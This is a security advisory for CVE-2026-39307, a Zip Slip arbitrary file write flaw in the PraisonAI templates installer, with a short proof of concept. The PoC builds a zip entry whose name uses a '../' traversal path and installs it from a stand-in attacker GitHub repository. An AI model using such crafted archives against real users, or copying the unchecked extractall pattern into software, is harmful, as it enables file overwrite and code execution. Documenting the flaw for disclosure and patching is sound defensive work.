PT-2026-30766 · Pypi · Praisonai
Published
2026-04-06
·
Updated
2026-04-06
·
CVE-2026-39307
CVSS v3.1
8.1
High
| AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H |
The PraisonAI templates installation feature is vulnerable to a "Zip Slip" Arbitrary File Write attack. When downloading and extracting template archives from external sources (e.g., GitHub), the application uses Python's
zipfile.extractall() without verifying if the files within the archive resolve outside of the intended extraction directory.Details
Location:
src/praisonai/praisonai/cli/features/templates.py (Line 852)Vulnerable Code snippet:
zip ref.extractall(tmpdir)During installation, the CLI downloads a ZIP archive and extracts it directly into a temporary directory using
zip ref.extractall(tmpdir). A specially crafted ZIP archive can contain file entries with relative paths (such as ../../../../tmp/evil.sh). If extracting this archive in older Python versions or environments where extraction rules aren't strict, extractall will write these files outside the target directory, allowing an attacker to overwrite arbitrary files on the victim's filesystem.PoC
- Generate a malicious zip payload:
import zipfile
with zipfile.ZipFile('malicious template.zip', 'w') as z:
# Adding a file that traverses directories
z.writestr('../../../../../../../tmp/zip slip pwned.txt', 'pwned by zip slip')- Trick a user into installing the malicious template:
praisonai templates install github:attacker/malicious template- Observe the
zip slip pwned.txtfile created in/tmp/on the victim's machine.
Impact
This is an Arbitrary File Write vulnerability affecting any user who installs community templates. It can be leveraged to overwrite system files, user dotfiles, or application code, ultimately leading to system corruption or full Remote Code Execution (RCE).
Fix
Relative Path Traversal
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Praisonai